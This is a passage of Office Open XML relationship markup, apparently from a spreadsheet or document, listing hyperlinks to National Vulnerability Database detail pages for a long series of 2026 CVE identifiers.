Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-76971" TargetMode="External" Id="rId1125" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77896" TargetMode="External" Id="rId1126" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77911" TargetMode="External" Id="rId1127" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78441" TargetMode="External" Id="rId1128" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78453" TargetMode="External" Id="rId1129" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78502" TargetMode="External" Id="rId1130" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78503" TargetMode="External" Id="rId1131" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78515" TargetMode="External" Id="rId1132" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78520" TargetMode="External" Id="rId1133" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78522" TargetMode="External" Id="rId1134" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78838" TargetMode="External" Id="rId1135" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-79379" TargetMode="External" Id="rId1136" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-79573" TargetMode="External" Id="rId1137" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-80073" TargetMode="External" Id="rId1138" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-80076" TargetMode="External" Id="rId1139" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-80078" TargetMode="External" Id="rId1140" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-80079" TargetMode="External" Id="rId1141" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-80082" TargetMode="External" Id="rId1142" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-80084" TargetMode="External" Id="rId1143" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-80086" TargetMode="External" Id="rId1144" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-80087" TargetMode="External" Id="rId1145" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-80088" TargetMode="External" Id="rId1146" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-80089" TargetMode="External" Id="rId1147" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-80090" TargetMode="External" Id="rId1148" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-80091" TargetMode="External" Id="rId1149" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81377" TargetMode="External" Id="rId1150" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81792" TargetMode="External" Id="rId1151" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81802" TargetMode="External" Id="rId1152" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82059" TargetMode="External" Id="rId1153" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82069" TargetMode="External" Id="rId1154" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-84282" TargetMode="External" Id="rId1155" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-84391" TargetMode="External" Id="rId1156" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-84685" TargetMode="External" Id="rId1157" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86077" TargetMode="External" Id="rId1158" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86078" TargetMode="External" Id="rId1159" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86079" TargetMode="External" Id="rId1160" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86082" TargetMode="External" Id="rId1161" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86550" TargetMode="External" Id="rId1162" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86597" TargetMode="External" Id="rId1163" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86726" TargetMode="External" Id="rId1164" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86731" TargetMode="External" Id="rId1165" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-12230" TargetMode="External" Id="rId1166" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-33388" TargetMode="External" Id="rId1167" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69874" TargetMode="External" Id="rId1168" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69878" TargetMode="External" Id="rId1169" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-70582" TargetMode="External" Id="rId1170" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-71338" TargetMode="External" Id="rId1171" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72947" TargetMode="External" Id="rId1172" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-76931" TargetMode="External" Id="rId1173" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77887" TargetMode="External" Id="rId1174" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77891" TargetMode="External" Id="rId1175" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-53639" TargetMode="External" Id="rId1176" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81824" TargetMode="External" Id="rId1177" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81904" TargetMode="External" Id="rId1178" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81994" TargetMode="External" Id="rId1179" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81997" TargetMode="External" Id="rId1180" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-84942" TargetMode="External" Id="rId1181" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86590" TargetMode="External" Id="rId1182" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-18090" TargetMode="External" Id="rId1183" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-19872" TargetMode="External" Id="rId1184" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-63523" TargetMode="External" Id="rId1185" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69642" TargetMode="External" Id="rId1186" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-76002" TargetMode="External" Id="rId1187" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77654" TargetMode="External" Id="rId1188" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78738" TargetMode="External" Id="rId1189" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78741" TargetMode="External" Id="rId1190" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78742" TargetMode="External" Id="rId1191" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85484" TargetMode="External" Id="rId1192" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85485" TargetMode="External" Id="rId1193" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85630" TargetMode="External" Id="rId1194" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-56101" TargetMode="External" Id="rId1195" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78216" TargetMode="External" Id="rId1196" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78230" TargetMode="External" Id="rId1197" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78552" TargetMode="External" Id="rId1198" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78622" TargetMode="External" Id="rId1199" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82056" TargetMode="External" Id="rId1200" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82063" TargetMode="External" Id="rId1201" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-16004" TargetMode="External" Id="rId1202" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69304" TargetMode="External" Id="rId1203" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69382" TargetMode="External" Id="rId1204" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-70091" TargetMode="External" Id="rId1205" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72978" TargetMode="External" Id="rId1206" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73310" TargetMode="External" Id="rId1207" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75809" TargetMode="External" Id="rId1208" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78620" TargetMode="External" Id="rId1209" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-16005" TargetMode="External" Id="rId1210" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69559" TargetMode="External" Id="rId1211" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75811" TargetMode="External" Id="rId1212" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-16006" TargetMode="External" Id="rId1213" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-18023" TargetMode="External" Id="rId1214" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-68874" TargetMode="External" Id="rId1215" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69317" TargetMode="External" Id="rId1216" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69349" TargetMode="External" Id="rId1217" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69372" TargetMode="External" Id="rId1218" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69393" TargetMode="External" Id="rId1219" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69405" TargetMode="External" Id="rId1220" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69416" TargetMode="External" Id="rId1221" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69507" TargetMode="External" Id="rId1222" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69552" TargetMode="External" Id="rId1223" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69569" TargetMode="External" Id="rId1224" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69572" TargetMode="External" Id="rId1225" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69591" TargetMode="External" Id="rId1226" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69637" TargetMode="External" Id="rId1227" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69679" TargetMode="External" Id="rId1228" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69723" TargetMode="External" Id="rId1229" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75808" TargetMode="External" Id="rId1230" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75810" TargetMode="External" Id="rId1231" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78629" TargetMode="External" Id="rId1232" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-28584" TargetMode="External" Id="rId1233" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-28596" TargetMode="External" Id="rId1234" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-28617" TargetMode="External" Id="rId1235" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-28633" TargetMode="External" Id="rId1236" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-49883" TargetMode="External" Id="rId1237" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-54611" TargetMode="External" Id="rId1238" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-68830" TargetMode="External" Id="rId1239" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-68831" TargetMode="External" Id="rId1240" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-68842" TargetMode="External" Id="rId1241" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-68843" TargetMode="External" Id="rId1242" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-68851" TargetMode="External" Id="rId1243" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-68852" TargetMode="External" Id="rId1244" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-68873" TargetMode="External" Id="rId1245" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-68881" TargetMode="External" Id="rId1246" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-68886" TargetMode="External" Id="rId1247" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-68895" TargetMode="External" Id="rId1248" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69286" TargetMode="External" Id="rId1249" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69288" TargetMode="External" Id="rId1250" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69294" TargetMode="External" Id="rId1251" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69303" TargetMode="External" Id="rId1252" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69308" TargetMode="External" Id="rId1253" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69315" TargetMode="External" Id="rId1254" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69318" TargetMode="External" Id="rId1255" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69321" TargetMode="External" Id="rId1256" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69339" TargetMode="External" Id="rId1257" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69343" TargetMode="External" Id="rId1258" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69344" TargetMode="External" Id="rId1259" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69345" TargetMode="External" Id="rId1260" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69351" TargetMode="External" Id="rId1261" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69353" TargetMode="External" Id="rId1262" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69367" TargetMode="External" Id="rId1263" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69369" TargetMode="External" Id="rId1264" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69376" TargetMode="External" Id="rId1265" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69390" TargetMode="External" Id="rId1266" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69403" TargetMode="External" Id="rId1267" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69406" TargetMode="External" Id="rId1268" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69453" TargetMode="External" Id="rId1269" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69457" TargetMode="External" Id="rId1270" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69504" TargetMode="External" Id="rId1271" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69527" TargetMode="External" Id="rId1272" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69531" TargetMode="External" Id="rId1273" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69554" TargetMode="External" Id="rId1274" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69568" TargetMode="External" Id="rId1275" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69609" TargetMode="External" Id="rId1276" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69616" TargetMode="External" Id="rId1277" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69618" TargetMode="External" Id="rId1278" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69627" TargetMode="External" Id="rId1279" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69672" TargetMode="External" Id="rId1280" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69674" TargetMode="External" Id="rId1281" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69684" TargetMode="External" Id="rId1282" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69741" TargetMode="External" Id="rId1283" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69770" TargetMode="External" Id="rId1284" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69794" TargetMode="External" Id="rId1285" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69808" TargetMode="External" Id="rId1286" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69862" TargetMode="External" Id="rId1287" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-70145" TargetMode="External" Id="rId1288" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-70290" 